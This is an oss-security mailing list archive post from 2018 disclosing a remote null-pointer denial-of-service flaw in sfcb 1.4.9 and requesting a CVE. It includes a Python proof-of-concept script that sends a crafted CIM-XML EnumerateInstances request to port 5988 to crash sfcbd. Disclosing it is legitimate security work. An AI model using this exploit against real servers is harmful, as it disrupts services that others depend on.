'[oss-security] report a vulnerability in sfcb software.'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] report a vulnerability in sfcb software.
From:       XinleiHe <hxl1999 () yeah ! net>
Date:       2018-01-31 14:44:22
Message-ID: 722994b1.3f3f.1614cad02fb.Coremail.hxl1999 () yeah ! net
[Download RAW message or body]

[Attachment #2 (text/plain)]

Hi there,


I am XinleiHe. I will report a vulnerability in sfcb software.
SFCB is a CIM server for resource-constrained and embedded environments. It's offical website \
is sblim.sourceforge.net/wiki/index.php/Sfcb.  
A null pointer vulnerabilty exists in sfcb newest version(1.4.9),a remote attacher can send a \
crafted packet trigger to this vulnerabilty , and make sfcbd DOS. I want to apply a cve id for \
this vulnerabilty.




You can use following python code to reproduce this vulnerability.
--------------------------------------------------------------
import httplib
from xml.dom.minidom import Document
class write_xml(Document):
    def __init__(self):


        Document.__init__(self)
 
    def set_tag(self,tag):
        self.tag = tag
        self.cim = self.createElement(self.tag)
        #self.setAttribute("encoding", "utf-8")
        
        self.cim.setAttribute("CIMVERSION", "2.0")
        self.cim.setAttribute("DTDVERSION", "2.0")
        self.appendChild(self.cim)


        self.msg = self.createElement("MESSAGE")
        self.msg.setAttribute("ID", "4711")
        self.msg.setAttribute("PROTOCOLVERSION","1.0")
        self.cim.appendChild(self.msg)


        self.sim = self.createElement("SIMPLEREQ")
        self.msg.appendChild(self.sim)


        self.ime = self.createElement("IMETHODCALL")
        self.ime.setAttribute("NAME","EnumerateInstances")
        self.sim.appendChild(self.ime)


        self.local = self.createElement("LOCALNAMESPACEPATH")
        self.ime.appendChild(self.local)
       
        self.names1=self.createElement("NAMESPACE")
        self.names1.setAttribute("NAME", "root")
        self.local.appendChild(self.names1)


    def display(self):
        print self.toprettyxml(indent="   ")
    def retdata(self):
        return self.toprettyxml(indent="   ")


def httpreq(data):
conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
conn.request('POST', '/cimom',data)
res = conn.getresponse() 


def main():
wx = write_xml()
wx.set_tag('CIM')
print wx.retdata()
print httpreq(wx.retdata())


if __name__=='__main__':
main()
-------------------------------------------------------



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic